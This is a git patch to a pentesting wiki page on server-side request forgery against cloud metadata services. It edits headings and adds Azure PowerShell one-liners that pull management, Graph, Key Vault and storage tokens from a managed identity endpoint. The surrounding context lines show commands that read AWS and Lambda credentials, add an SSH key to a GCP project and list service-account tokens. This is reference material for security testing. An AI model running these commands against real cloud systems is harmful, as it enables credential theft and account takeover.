From 21283c564411cf54e6258d891a639f181c9ca915 Mon Sep 17 00:00:00 2001 From: Carlos Polop Date: Fri, 10 Jan 2025 10:08:03 +0100 Subject: [PATCH] aa ssrf --- .../cloud-ssrf.md | 71 ++++++------------- 1 file changed, 21 insertions(+), 50 deletions(-) diff --git a/src/pentesting-web/ssrf-server-side-request-forgery/cloud-ssrf.md b/src/pentesting-web/ssrf-server-side-request-forgery/cloud-ssrf.md index 7cdb561ae..68951fe99 100644 --- a/src/pentesting-web/ssrf-server-side-request-forgery/cloud-ssrf.md +++ b/src/pentesting-web/ssrf-server-side-request-forgery/cloud-ssrf.md @@ -111,7 +111,7 @@ curl "http://169.254.170.2$AWS_CONTAINER_CREDENTIALS_RELATIVE_URI" 2>/dev/null | > [!NOTE] > Note that in **some cases** you will be able to access the **EC2 metadata instance** from the container (check IMDSv2 TTL limitations mentioned previously). In these scenarios from the container you could access both the container IAM role and the EC2 IAM role. -### SSRF for AWS Lambda +### SSRF for AWS Lambda In this case the **credentials are stored in env variables**. So, to access them you need to access something like **`file:///proc/self/environ`**. @@ -126,7 +126,7 @@ Moreover, in addition to IAM credentials, Lambda functions also have **event dat > [!WARNING] > Note that **lambda credentials** are inside the **env variables**. So if the **stack trace** of the lambda code prints env vars, it's possible to **exfiltrate them provoking an error** in the app. -### SSRF URL for AWS Elastic Beanstalk +### SSRF URL for AWS Elastic Beanstalk We retrieve the `accountId` and `region` from the API. @@ -145,11 +145,11 @@ http://169.254.169.254/latest/meta-data/iam/security-credentials/aws-elasticbean Then we use the credentials with `aws s3 ls s3://elasticbeanstalk-us-east-2-[ACCOUNT_ID]/`. -## GCP +## GCP You can [**find here the docs about metadata endpoints**](https://cloud.google.com/appengine/docs/standard/java/accessing-instance-metadata). -### SSRF URL for Google Cloud +### SSRF URL for Google Cloud Requires the HTTP header **`Metadata-Flavor: Google`** and you can access the metadata endpoint in with the following URLs: @@ -260,7 +260,7 @@ http://metadata.google.internal/computeMetadata/v1beta1/?recursive=true > gcloud config unset auth/access_token_file > ``` -### Add an SSH key +### Add an SSH key Extract the token @@ -289,7 +289,7 @@ curl -X POST "https://www.googleapis.com/compute/v1/projects/1042377752888/setCo --data '{"items": [{"key": "sshkeyname", "value": "sshkeyvalue"}]}' ``` -### Cloud Functions +### Cloud Functions The metadata endpoint works the same as in VMs but without some endpoints: @@ -318,7 +318,7 @@ for sa in $(curl -s -f -H "Metadata-Flavor: Google" "http://metadata/computeMeta done ``` -## Digital Ocean +## Digital Ocean > [!WARNING] > There isn't things like AWS Roles or GCP service account, so don't expect to find metadata bot credentials @@ -337,7 +337,7 @@ http://169.254.169.254/metadata/v1/interfaces/public/0/ipv6/addressAll in one re curl http://169.254.169.254/metadata/v1.json | jq ``` -## Azure +## Azure ### Azure VM @@ -442,7 +442,7 @@ $userData = Invoke- RestMethod -Headers @{"Metadata"="true"} -Method GET -Uri "h {{#endtab}} {{#endtabs}} -### Azure App & Functions Services +### Azure App & Functions Services & Automation Accounts From the **env** you can get the values of **`IDENTITY_HEADER`** and **`IDENTITY_ENDPOINT`**. That you can use to gather a token to speak with the metadata server. @@ -519,57 +519,28 @@ $storageToken = Get-Token -Resource "https://storage.azure.com/" Write-Host "Storage Token: $storageToken" +# Using oneliners +## Get management token +(Invoke-RestMethod -Uri "${env:IDENTITY_ENDPOINT}?resource=https://management.azure.com/&api-version=2019-08-01" -Headers @{ "X-IDENTITY-HEADER" = "$env:IDENTITY_HEADER" }).access_token +## Get graph token +(Invoke-RestMethod -Uri "${env:IDENTITY_ENDPOINT}?resource=https://graph.microsoft.com/&api-version=2019-08-01" -Headers @{ "X-IDENTITY-HEADER" = "$env:IDENTITY_HEADER" }).access_token +## Get vault token +(Invoke-RestMethod -Uri "${env:IDENTITY_ENDPOINT}?resource=https://vault.azure.net/&api-version=2019-08-01" -Headers @{ "X-IDENTITY-HEADER" = "$env:IDENTITY_HEADER" }).access_token +## Get storage token +(Invoke-RestMethod -Uri "${env:IDENTITY_ENDPOINT}?resource=https://storage.azure.com/&api-version=2019-08-01" -Headers @{ "X-IDENTITY-HEADER" = "$env:IDENTITY_HEADER" }).access_token - -# API request in powershell to management endpoint -$Token = 'eyJ0eX..' -$URI='https://management.azure.com/subscriptions?api-version=2020-01-01' -$RequestParams = @{ - Method = 'GET' - Uri = $URI - Headers = @{ - 'Authorization' = "Bearer $Token" - } -} -(Invoke-RestMethod @RequestParams).value - -# API request to graph endpoint (get enterprise applications) -$Token = 'eyJ0eX..' -$URI = 'https://graph.microsoft.com/v1.0/applications' -$RequestParams = @{ - Method = 'GET' - Uri = $URI - Headers = @{ - 'Authorization' = "Bearer $Token" - } -} -(Invoke-RestMethod @RequestParams).value - -# Using AzureAD Powershell module witho both management and graph tokens -$token = 'eyJ0e..' -$graphaccesstoken = 'eyJ0eX..' -Connect-AzAccount -AccessToken $token -GraphAccessToken $graphaccesstoken -AccountId 2e91a4f12984-46ee-2736-e32ff2039abc - -# Try to get current perms over resources -Get-AzResource -## The following error means that the user doesn't have permissions over any resource -Get-AzResource : 'this.Client.SubscriptionId' cannot be null. -At line:1 char:1 -+ Get-AzResource -+ ~~~~~~~~~~~~~~ - + CategoryInfo : CloseError: (:) [Get-AzResource],ValidationException - + FullyQualifiedErrorId : -Microsoft.Azure.Commands.ResourceManager.Cmdlets.Implementation.GetAzureResourceCmdlet +## Remember that in Automation Accounts it might be declared the client ID of the assigned user managed identity inside the variable that can be gatehred with: +Get-AutomationVariable -Name 'AUTOMATION_SC_USER_ASSIGNED_IDENTITY_ID' ``` {{#endtab}} {{#endtabs}} -## IBM Cloud +## IBM Cloud > [!WARNING] > Note that in IBM by default metadata is not enabled, so it's possible that you won't be able to access it even if you are inside an IBM cloud VM